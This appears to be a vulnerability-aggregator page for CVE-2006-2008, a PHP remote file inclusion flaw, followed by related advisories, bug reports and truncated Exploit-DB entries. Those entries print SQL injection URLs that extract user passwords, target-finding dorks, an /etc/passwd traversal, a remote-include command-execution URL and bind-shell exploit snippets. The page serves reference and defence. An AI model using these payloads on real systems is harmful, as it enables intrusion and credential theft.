CVE-2006-2008
published 2006-04-25CVE-2006-2008: PHP remote file inclusion vulnerability in movie_cls.php in Built2Go PHP Movie Review 2B and earlier allows remote attackers to execute arbitrary PHP code via…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.45%
87.5th percentile
PHP remote file inclusion vulnerability in movie_cls.php in Built2Go PHP Movie Review 2B and earlier allows remote attackers to execute arbitrary PHP code via a URL in the full_path parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| built2go | movie_review | — | — |
| built2go | movie_review | — | — |
| built2go | movie_review | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-fwv8-vx7p-977c: PHP remote file inclusion vulnerability in movie_cls
ghsa_unreviewed·2022-05-01
CVE-2006-2008 [HIGH] GHSA-fwv8-vx7p-977c: PHP remote file inclusion vulnerability in movie_cls
PHP remote file inclusion vulnerability in movie_cls.php in Built2Go PHP Movie Review 2B and earlier allows remote attackers to execute arbitrary PHP code via a URL in the full_path parameter.
Red Hat
php: XSS via PHP error messages
vendor_redhat·2008-12-19·CVSS 2.6
CVE-2008-5814 [LOW] CWE-79 php: XSS via PHP error messages
php: XSS via PHP error messages
Cross-site scripting (XSS) vulnerability in PHP, possibly 5.2.7 and earlier, when display_errors is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: because of the lack of details, it is unclear whether this is related to CVE-2006-0208.
Red Hat
phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
vendor_redhat·2008-10-27·CVSS 6.8
CVE-2008-4775 [MEDIUM] CWE-79 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin 3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977.
Red Hat
awstats: Cross-site scripting (XSS) vulnerability
vendor_redhat·2008-06-23·CVSS 2.6
CVE-2008-3714 [LOW] CWE-79 awstats: Cross-site scripting (XSS) vulnerability
awstats: Cross-site scripting (XSS) vulnerability
Cross-site scripting (XSS) vulnerability in awstats.pl in AWStats 6.8 allows remote attackers to inject arbitrary web script or HTML via the query_string, a different vulnerability than CVE-2006-3681 and CVE-2006-1945.
Red Hat
cups: overflow in gif image filter
vendor_redhat·2008-04-01·CVSS 2.6
CVE-2008-1373 [LOW] cups: overflow in gif image filter
cups: overflow in gif image filter
Buffer overflow in the gif_read_lzw function in CUPS 1.3.6 allows remote attackers to have an unknown impact via a GIF file with a large code_size value, a similar issue to CVE-2006-4484.
Red Hat
wireshark: crash in LDAP dissector
vendor_redhat·2008-03-28·CVSS 5.0
CVE-2008-1562 [MEDIUM] wireshark: crash in LDAP dissector
wireshark: crash in LDAP dissector
The LDAP dissector in Wireshark (formerly Ethereal) 0.99.2 through 0.99.8 allows remote attackers to cause a denial of service (application crash) via a malformed packet, a different vulnerability than CVE-2006-5740.
Red Hat
mailman: XSS triggerable by list administrator
vendor_redhat·2008-01-03·CVSS 6.8
CVE-2008-0564 [MEDIUM] CWE-79 mailman: XSS triggerable by list administrator
mailman: XSS triggerable by list administrator
Multiple cross-site scripting (XSS) vulnerabilities in Mailman before 2.1.10b1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) editing templates and (2) the list's "info attribute" in the web administrator interface, a different vulnerability than CVE-2006-3636.
Package: mailman (Red Hat Enterprise Linux 6) - Not affected
Red Hat
CVE-2006-2050: SQL injection vulnerability in dcboard
vendor_redhat·CVSS 5.0
CVE-2006-2050 [MEDIUM] CVE-2006-2050: SQL injection vulnerability in dcboard
SQL injection vulnerability in dcboard.cgi in DCScripts DCForumLite 3.0 allows remote attackers to execute arbitrary SQL commands via the az parameter.
Statement: Red Hat does not consider this to be a security issue. The FastCGI server is local trusted code and not under the control of an attacker, no trust boundary is crossed.
For more information please see:
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2008-2050
No detection rules found.
Exploit-DB
Joomla! Component Jobline 1.3.1 - Blind SQL Injection
exploitdb·2009-07-17
CVE-2009-2554 Joomla! Component Jobline 1.3.1 - Blind SQL Injection
Joomla! Component Jobline 1.3.1 - Blind SQL Injection
---
##################################################
# Joomla Component: Jobline magic_quotes_gpc =Off
# ==================================
# {Author}: ManhLuat93
# {My HomePage}: http://manhluat.com/
##################################################
Live Demo: http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=
[-] Exploit [+]
[--] http://localh0st/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='
[++] http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='
note:
Jobline
08 Jan 2008
1.3.1
1.5
(c) 2006 Olle Johansson
GNU GPL
# milw0rm.com [2009-07-17]
Exploit-DB
ClipShare Pro 2006-2007 - 'chid' SQL Injection
exploitdb·2008-11-15
CVE-2008-5489 ClipShare Pro 2006-2007 - 'chid' SQL Injection
ClipShare Pro 2006-2007 - 'chid' SQL Injection
---
SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM
S N N N A A K K E S T E A A M M M M
SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M
S N N N A A K K E S T E A A M M M
SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M
===================================================SNAKES TEAM====================================================
+ =
= Script: clipShare Remote SQL Injection Vulnerability +
+ =
==============================================:::ALGERIAN HaCkEr:::===============================================
= = = =
= = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = =
= =
= = ************ ::::::home : www.snakespc.com/sc::::::*************** = =
= =
= = :::::Mail: [email protected]::::::: = =
= =
= script:http://www.clip-sha
Exploit-DB
ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)
exploitdb·2008-09-25·CVSS 7.5
CVE-2006-6488 [HIGH] ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)
ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)
---
##
# $Id: iconics_dlgwrapper.rb 1 2008-09-21 22:43:00Z kf $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
#
# $ msfcli exploit/windows/browser/iconics_dlgwrapper RHOST=10.211.55.6 PAYLOAD=windows/shell_bind_tcp E
require 'msf/core'
module Msf
class Exploits::Windows::Browser::Iconics_Dlgwrapper 'ICONICS Vessel / Gauge / Switch 8.02.140 ActiveX DoModal Overflow',
'Description' => %q{
This module exploits a stack overflow in the Iconics Vessel / Gauge / Switch ActiveX controls
},
'Lice
Exploit-DB
Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow
exploitdb·2008-09-06
CVE-2008-4470 Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow
Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow
---
/*Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow
This sploit Launches calc.exe .. classical buffer overflow ,a 500 byte buffer is causing the exeption.
Tested on WinXP Pro sp3,compiled with DEv-C++ 4.9.9.2.
After preparation:
|Access violation when executing [58414158]|
EAX 00000001
ECX 004C01B2 cue_tria.004C01B2
EDX 01030608
EBX 0309948D ASCII "I:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 0013EC98 ASCII "eeeeeeeeeeeeeeeeeeeeeeeeeeeYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYr Of The Dog Again (2006)[T-Boyz]\13.
Exploit-DB
Page Manager CMS 2006-02-04 - Arbitrary File Upload
exploitdb·2008-06-25
CVE-2008-7167 Page Manager CMS 2006-02-04 - Arbitrary File Upload
Page Manager CMS 2006-02-04 - Arbitrary File Upload
---
Page Manager CMS Remote Arbitrary File Upload Vulnerability
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 25 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : Page Manager
VERSION : 2006-02-04
VENDOR : N/A
DOWNLOAD : http://downloads.sourceforge.net/pagemanager
#####################################################
---Arbitrary File Upload Exploit---
This Vulnerability can upload malicious files direct to web server.
[A
Exploit-DB
Linksys WRT54G Firmware 1.00.9 - Security Bypass (2)
exploitdb·2008-06-24·CVSS 5.0
CVE-2006-5202 [MEDIUM] Linksys WRT54G Firmware 1.00.9 - Security Bypass (2)
Linksys WRT54G Firmware 1.00.9 - Security Bypass (2)
---
__ _ ____ ____ ___ ____ ____ ____ _____ ____ ____ _____ ___
| l/ ]l j| \ / \ | \l j| \ | T l j| \ | | / \
| ' / | T | _ YY Y| o )| T | _ Yl__/ | | T | _ Y| __jY Y
| \ | | | | || Q || _/ | | | | || __j | | | | || l_ | O |
| Y | | | | || || | | | | | || / | __ | | | | || _] | |
| . | j l | | |l || | j l | | || || T j l | | || T l !
l__j\_j|____jl__j__j \__,_jl__j |____jl__j__jl_____jl__j|____jl__j__jl__j \___/
<><> Hacking the Linksys WRT54G #2
<><> https://kinqpinz.info/
<><> by meathive
<><> root at kinqpinz.info && kinqpinz.info at gmail.com
++| CVE-2008-1247
The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials
when invoking scripts, which allows remote attackers to perform arbitrary
Exploit-DB
Apple iCal 3.0.1 - 'COUNT' Integer Overflow
exploitdb·2008-04-21
CVE-2008-2006 Apple iCal 3.0.1 - 'COUNT' Integer Overflow
Apple iCal 3.0.1 - 'COUNT' Integer Overflow
---
source: https://www.securityfocus.com/bid/28629/info
Apple iCal is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
This issue affects iCal 3.0.1 running on Mac OS X 10.5.1; previous versions may also be affected.
BEGIN:VCALENDAR
X-WR-TIMEZONE:America/Buenos_Aires
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
X-WR-CALNAME: Vulnerable
VERSION:2.0
X-WR-RELCALID:10DE4203-4FA5-4E23-AE4D-9DAE3157C9E5
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-
Exploit-DB
TFTP Server 1.4 - ST Buffer Overflow
exploitdb·2008-03-26
CVE-2008-1611 TFTP Server 1.4 - ST Buffer Overflow
TFTP Server 1.4 - ST Buffer Overflow
---
#!/usr/bin/python
# TFTP Server for Windows V1.4 ST (0day)
# http://sourceforge.net/projects/tftp-server/
# Tested on Windows Vista SP0.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt
##################################################################
# bt ~ # sourceforge-tftpd.py
# [*] TFTP Server for Windows V1.4 ST (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.134 4444
# (UNKNOWN) [172.16.167.134] 4444 (krb524) open
# Microsoft Windows [Version 6.0.6000]
# Copyright (c) 2006 Microsoft Corporation. All
# rights reserved.
#
# C:\Windows\system32>
##############################
Exploit-DB
Joomla! Component custompages 1.1 - Remote File Inclusion
exploitdb·2008-03-22
CVE-2008-1505 Joomla! Component custompages 1.1 - Remote File Inclusion
Joomla! Component custompages 1.1 - Remote File Inclusion
---
@ JOOmla Component custompages custompages
06/11/2006
Shawn Sandy
Copyright 2006 - Shawn Sandy
License
[email protected]
www.sstreamtv.com
1.1
# milw0rm.com [2008-03-22]
Exploit-DB
eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
exploitdb·2008-03-14
CVE-2008-1407 eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
---
##########################################
#
# Powered by eXV2 WebChat 1.60 SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : [email protected]
#
###########################################
#
# DORKS 1 : allinurl :"modules/WebChat"
#
###########################################
EXPLOIT 1 :
modules/WebChat/index.php?roomid=-9999999/**/union/**/select/**/0,uname,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
###########################################
WebChat 1.60
Submit date: 2006/6/13
Homepage: www.exv2.de
Version : 1.60
Downloads : 561
Filesize : 79.76 KB
Supported platforms : eXV2
#################################
Exploit-DB
eXV2 Module MyAnnonces - 'lid' SQL Injection
exploitdb·2008-03-14
CVE-2008-1406 eXV2 Module MyAnnonces - 'lid' SQL Injection
eXV2 Module MyAnnonces - 'lid' SQL Injection
---
##########################################
#
# Powered by eXV2 MyAnnonces 1.8 SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : [email protected]
#
###########################################
#
# DORK 1 : eXV2 MyAnnonces
#
###########################################
EXPLOIT :
modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-9999999/**/union/**/select/**/pass,pass,uname,0x3a,0x3a,0x3a,0x3a,0,0,0,0x3a,0x3a,1/**/from/**/exv2_users/*where%20exv2_admin%201
###########################################
Category: eXV2 - Module
myannonces 1.8
Submit date; 2006/4/10
Version : 1.8
###########################################
################
Exploit-DB
TRUC 0.11.0 - 'download.php' Remote File Disclosure
exploitdb·2008-02-16
CVE-2008-0814 TRUC 0.11.0 - 'download.php' Remote File Disclosure
TRUC 0.11.0 - 'download.php' Remote File Disclosure
---
### TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability
### http://switch.dl.sourceforge.net/sourceforge/truc/truc_0.11.0.tar.gz
### POC :
### /download.php?upload_filename=config_inc.php
### /download.php?upload_filename=../../../../../../../../etc/passwd
### Dork : TRUC 0.11.0 :: © 2006 by ASDIS :
### I'm TRYAGI ;) -- Tryag.cc/cc
# milw0rm.com [2008-02-16]
Exploit-DB
Mambo Component Sermon 0.2 - 'gid' SQL Injection
exploitdb·2008-02-07
CVE-2008-0721 Mambo Component Sermon 0.2 - 'gid' SQL Injection
Mambo Component Sermon 0.2 - 'gid' SQL Injection
---
#########################################################################
#
# netadvantist@copyright 2006 SQL Injection(com_na_xxx)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
#########################################################################
#
# DORKS 1 : allinurl:"com_na_content"
#
# DORK 2 : allinurl:"com_na_bible"
#
# DORKS 3 : allinurl:"com_na_events"
#
# DORKS 4 : allinurl:"com_na_content"
#
# DORKS 5 : allinurl:"com_na_feedback"
#
# DORKS 6 : allinurl:"com_na_mydocs"
#
# DORKS 7 : allinurl:"com_na_churchmap"
#
# DORKS 8 : allinurl:"com_na_bibleinfo"
#
# DORKS 9 : allinurl:"com_na_dbs"
#
# DORKS 10 : allinurl:"com_na_udm"
#
# DORKS 1
Exploit-DB
PHP-RESIDENCE 0.7.2 - 'Search' SQL Injection
exploitdb·2008-01-16
CVE-2008-0353 PHP-RESIDENCE 0.7.2 - 'Search' SQL Injection
PHP-RESIDENCE 0.7.2 - 'Search' SQL Injection
---
#####################################################################################
#### PHPRESIDENCE 0.7.2 Remote Sql Injection ####
#### BY IRCRASH ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm) #
# #
#Script Download : http://www.digitaldruid.net/download/php-residence_0.7.2.zip #
# #
#Vulnerability Page: http://site.com/path/visualizza_tabelle.php?id_sessione=&anno=2006&tipo_tabella=clienti
# #
#Search query : 99999'union/**/select/**/idutenti,nome_utente,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/utenti/*
# #
#Help : Go Vulnerability Pag
Exploit-DB
IdeaBox 1.1 - 'gorumDir' Remote File Inclusion
exploitdb·2006-06-19
CVE-2008-5199 IdeaBox 1.1 - 'gorumDir' Remote File Inclusion
IdeaBox 1.1 - 'gorumDir' Remote File Inclusion
---
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ IdeaBox <= 1.1 (gorumDir) Remote File Include Vulnerability
$$ script site: http://ideabox.phpoutsourcing.com/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: [email protected] or http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$ Adam, DeathSpeed, Drzewko, pepi
$$
$$ Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
/*
19 Czerwca 2006r. Znikam na miesiac jade na wakacje :-)
19 June 2006 go to vacations !!!! I return for month, Cya ;-)
*/
#include.p
Exploit-DB
Built2Go PHP Movie Review 2B - Remote File Inclusion
exploitdb·2006-04-23
CVE-2006-2008 Built2Go PHP Movie Review 2B - Remote File Inclusion
Built2Go PHP Movie Review 2B - Remote File Inclusion
---
Built2Go PHP Movie Review <=2B Remote File Inclusion Vulnerability
in movie_cls.php
# require_once("$full_path/review_cls.php");
usage:
# http://www.site.com/[path]/movie_cls.php?full_path=http://www.site.com/x.txt?&cmd=uname -a
# milw0rm.com [2006-04-23]
Bugzilla
CVE-2008-5814 php: XSS via PHP error messages
bugzilla·2009-01-15·CVSS 2.6
CVE-2008-5814 [LOW] CVE-2008-5814 php: XSS via PHP error messages
CVE-2008-5814 php: XSS via PHP error messages
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-5814 to the following vulnerability:
Cross-site scripting (XSS) vulnerability in PHP, possibly 5.2.7 and earlier,
when display_errors is enabled, allows remote attackers to inject arbitrary web
script or HTML via unspecified vectors. NOTE: because of the lack of details,
it is unclear whether this is related to CVE-2006-0208.
References:
http://jvndb.jvn.jp/en/contents/2008/JVNDB-2008-000084.html
http://jvn.jp/en/jp/JVN50327700/index.html
Discussion:
PHP packages as shipped in Red Hat Enterprise Linux 4 and later set display_errors to off in the default php.ini configuration file.
Default setting for display_errors in PHP packages in Red Hat Enterprise Linux 2.1 and 3 is
Bugzilla
CVE-2008-4775 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
bugzilla·2008-10-29·CVSS 6.8
CVE-2008-4775 [MEDIUM] CVE-2008-4775 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
CVE-2008-4775 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-4775 to the following vulnerability:
Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin
3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when
register_globals is enabled, allows remote attackers to inject
arbitrary web script or HTML via the db parameter, a different vector
than CVE-2006-6942 and CVE-2007-5977.
References:
http://www.securityfocus.com/archive/1/archive/1/497815/100/0/threaded
http://www.securityfocus.com/bid/31928
http://secunia.com/advisories/32449
Discussion:
613 (phpMyAdmin): Build on target fedora-4-epel succeeded.
612 (phpMyAdmin): Build on target fedora-5-epel suc
Bugzilla
CVE-2008-3714 awstats: Cross-site scripting (XSS) vulnerability
bugzilla·2008-08-20·CVSS 2.6
CVE-2008-3714 [LOW] CVE-2008-3714 awstats: Cross-site scripting (XSS) vulnerability
CVE-2008-3714 awstats: Cross-site scripting (XSS) vulnerability
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-3714
to the following vulnerability:
Cross-site scripting (XSS) vulnerability in awstats.pl in AWStats 6.8 allows
remote attackers to inject arbitrary web script or HTML via the query_string,
a different vulnerability than CVE-2006-3681 and CVE-2006-1945.
References:
http://bugs.gentoo.org/show_bug.cgi?id=235225
Upstream patch:
http://awstats.cvs.sourceforge.net/awstats/awstats/wwwroot/cgi-bin/awstats.pl?r1=1.910&r2=1.912
Upstream bug report:
http://sourceforge.net/tracker/index.php?func=detail&aid=2001151&group_id=13764&atid=113764
Discussion:
CVE-2008-3714: This issue affects the versions of the awstats package
as shipped with Fedora 8, Fedora 9 a
Bugzilla
CVE-2006-5755 kernel: local denial of service due to NT bit leakage
bugzilla·2008-08-04·CVSS 4.9
CVE-2006-5755 [MEDIUM] CVE-2006-5755 kernel: local denial of service due to NT bit leakage
CVE-2006-5755 kernel: local denial of service due to NT bit leakage
Description of problem:
Linux kernel before 2.6.18, when running on x86_64 systems, does not properly save or restore EFLAGS during a context switch, which allows local users to cause a denial of service (crash) by causing SYSENTER to set an NT flag, which can trigger a crash on the IRET of the next task.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5755
Discussion:
Proposed upstream patch:
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=658fdbef66e5e9be79b457edc2cbbb3add840aa9
---
Created attachment 313340
Upstream patch for this issue
---
This was addressed via:
Red Hat Enterprise Linux version 5 (RHSA-2008:0957)
Bugzilla
CVE-2008-1562 wireshark: crash in LDAP dissector
bugzilla·2008-04-01·CVSS 5.0
CVE-2008-1562 [MEDIUM] CVE-2008-1562 wireshark: crash in LDAP dissector
CVE-2008-1562 wireshark: crash in LDAP dissector
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-1562 to the following vulnerability:
The LDAP dissector in Wireshark (formerly Ethereal) 0.99.2 through 0.99.8 allows remote attackers to cause a denial of service (application crash) via a malformed packet, a different vulnerability than CVE-2006-5740.
Refences:
http://www.wireshark.org/security/wnpa-sec-2008-02.html
http://www.securityfocus.com/bid/28485
http://www.frsirt.com/english/advisories/2008/1007/references
http://secunia.com/advisories/29569
Discussion:
wireshark-1.0.0-1.fc7 has been pushed to the Fedora 7 stable repository. If problems still persist, please make note of it in this bug report.
---
wireshark-1.0.0-1.fc8 has been pushed to the Fedora 8 stabl
Bugzilla
CVE-2008-1373 cups: overflow in gif image filter
bugzilla·2008-03-20·CVSS 2.6
CVE-2008-1373 [LOW] CVE-2008-1373 cups: overflow in gif image filter
CVE-2008-1373 cups: overflow in gif image filter
It was discovered that GIF parsing code used by CUPS printing system is affected
by similar issue as GIF parsers used by gd / netpbm / tk / SDL_image.
Value of code_size read from GIF image is not properly validate before being
used to initialize table array in gif_read_lzw(), causing a static buffer overflow.
Issue is similar to:
CVE-2006-4484 (gd), CVE-2007-6697 (SDL_image), CVE-2008-0553 (tk), CVE-2008-0554
(netpbm)
Discussion:
Created attachment 298680
Proposed patch
Similar to fixed used in gd / tk / netpbm / SDL_image.
---
Tracked upstream via: http://www.cups.org/str.php?L2765
---
cups-1.2.12-10.fc7 has been submitted as an update for Fedora 7
---
cups-1.3.6-4.fc8 has been pushed to the Fedora 8 stable repository. If probl
Bugzilla
CVE-2008-1367 [RHEL5] Kernel doesn't clear DF for signal handlers
bugzilla·2008-03-05·CVSS 7.5
CVE-2008-1367 [HIGH] CVE-2008-1367 [RHEL5] Kernel doesn't clear DF for signal handlers
CVE-2008-1367 [RHEL5] Kernel doesn't clear DF for signal handlers
The debian folks reported that kernel doesn't ensure direction flag is cleared
upon entry to signal handler, which violates both i?86 and x86_64 ABIs.
Old GCCs conservatively used cld anyway before using any instructions that use
that flag, but GCC 4.3 no longer does that, it relies on the ABI guarantees that
on entry to a function the direction flag must be cleared.
See http://gcc.gnu.org/ml/gcc-patches/2006-12/msg00276.html
Anything that uses std instruction must cld again before calling another
function or before returning from function.
Unfortunately, if async signal is sent while a thread has std flag set, kernel
will start a signal handler with DF flag set.
The fix is addition of regs->eflags &= ~X86_EFLAGS_DF; or si
Bugzilla
CVE-2008-0553 tk: GIF handling buffer overflow
bugzilla·2008-02-05·CVSS 2.6
CVE-2008-0553 [LOW] CVE-2008-0553 tk: GIF handling buffer overflow
CVE-2008-0553 tk: GIF handling buffer overflow
tk GIF handling code is based on the same code as used by gd and SDL_image and
is affected by the overflow known as CVE-2006-4484 and CVE-2007-6697.
ReadImage function in tkImgGIF.c does not properly check the value of
initialCodeSize value read from GIF image before using it as upper bound during
the initialization of append array. This can result in stack buffer overflow.
Upstream fix:
http://tktoolkit.cvs.sourceforge.net/tktoolkit/tk/generic/tkImgGIF.c?r1=1.40&r2=1.41
This is expected to be included in upstream tk version 8.5.1.
Related issues:
CVE-2006-4484 (gd), CVE-2007-6697 (SDL_image), CVE-2008-0554 (netpbm)
Discussion:
perl-Tk uses embedded copy of tk source code and is affected by this problem
too. Adding perl-Tk maintainers t
Bugzilla
CVE-2008-0554 netpbm: GIF handling buffer overflow in giftopnm
bugzilla·2008-02-05·CVSS 2.6
CVE-2008-0554 [LOW] CVE-2008-0554 netpbm: GIF handling buffer overflow in giftopnm
CVE-2008-0554 netpbm: GIF handling buffer overflow in giftopnm
GIF handling code used in netpbm's giftopnm converter is based on the same code
as used by gd and SDL_image and is affected by the overflow known as
CVE-2006-4484 and CVE-2007-6697.
readImageData function in giftopnm.c does not properly check the value of
lzwMinCodeSize value read from GIF image before passing it to lzwInit, which
uses it as upper bound during the initialization of fixed sized table array,
leading to a buffer overflow.
This issue was fixed in upstream version 10.27. Code checking the value is in
the initial giftopnm.c revision in projects public SVN repository:
http://netpbm.svn.sourceforge.net/viewvc/netpbm/trunk/converter/other/giftopnm.c?revision=1&view=markup#l_1052
This issue does not affect netpbm pa
Bugzilla
CVE-2008-0553 tk: GIF handling buffer overflow [rawhide]
bugzilla·2008-02-05·CVSS 2.6
CVE-2008-0553 [LOW] CVE-2008-0553 tk: GIF handling buffer overflow [rawhide]
CVE-2008-0553 tk: GIF handling buffer overflow [rawhide]
+++ This bug was initially created as a clone of Bug #431518 +++
tk GIF handling code is based on the same code as used by gd and SDL_image and
is affected by the overflow known as CVE-2006-4484 and CVE-2007-6697.
ReadImage function in tkImgGIF.c does not properly check the value of
initialCodeSize value read from GIF image before using it as upper bound during
the initialization of append array. This can result in stack buffer overflow.
Upstream fix:
http://tktoolkit.cvs.sourceforge.net/tktoolkit/tk/generic/tkImgGIF.c?r1=1.40&r2=1.41
This is expected to be included in upstream tk version 8.5.1.
Related issues:
CVE-2006-4484 (gd), CVE-2007-6697 (SDL_image), CVE-2008-0554 (netpbm)
-- Additional comment from [email protected] on
Bugzilla
CVE-2006-4538 kernel: Local DoS with corrupted ELF
bugzilla·2007-09-13·CVSS 4.9
CVE-2006-4538 [MEDIUM] CVE-2006-4538 kernel: Local DoS with corrupted ELF
CVE-2006-4538 kernel: Local DoS with corrupted ELF
Already fixed for RHEL4, but not for RHEL3/2.1-ia64. See bz#205335 for
EL4 reproducer.
From Kirill Korotaev:
When running on IA64 or SPARC platforms, local users can cause a denial of
service via a malformed ELF file and then triggered by cross-region mappings.
http://lkml.org/lkml/2006/9/4/116
Discussion:
This issue has been addressed in following products:
Red Hat Linux Enterprise 2.1
Red Hat Linux Enterprise 3
Via RHSA-2007:1049 available at https://rhn.redhat.com/errata/RHSA-2007-1049.html and RHSA-2008:0787 available at https://rhn.redhat.com/errata/RHSA-2008-0787.html
Tenable
Marcus Ranum PaulDotCom Interview on Penetration Testing
blogs_tenable·2008-12-14·CVSS 7.8
[HIGH] Marcus Ranum PaulDotCom Interview on Penetration Testing
Blog / Company
Subscribe
# Marcus Ranum PaulDotCom Interview on Penetration Testing
Ron Gula
December 14, 2008
0 Min Read
Tenable's CSO, Marcus Ranum, was recently interviewed on the PaulDotCom Security Weekly podcast. They discussed a wide range of topics regarding penetration testing, secure coding, Marcus's "6 Dumbest Ideas" in computer security and much more.
- Full PaulDotCom show notes.
- Direct link to the show's MP3 audio recording.
- Tenable podcast and slides on Marcus's "6 Dumbest Ideas in Computer Security" presentation from from 2006.
- Very cool image of Marcus Ranum demonstrating cutting edge computer security practices.
## Related articles
March 17, 2026
## FAQ on CVE-2026-21514: OLE bypass N-Day in Microsoft Word
An N-day vulnerability in Microsoft Word exposes n
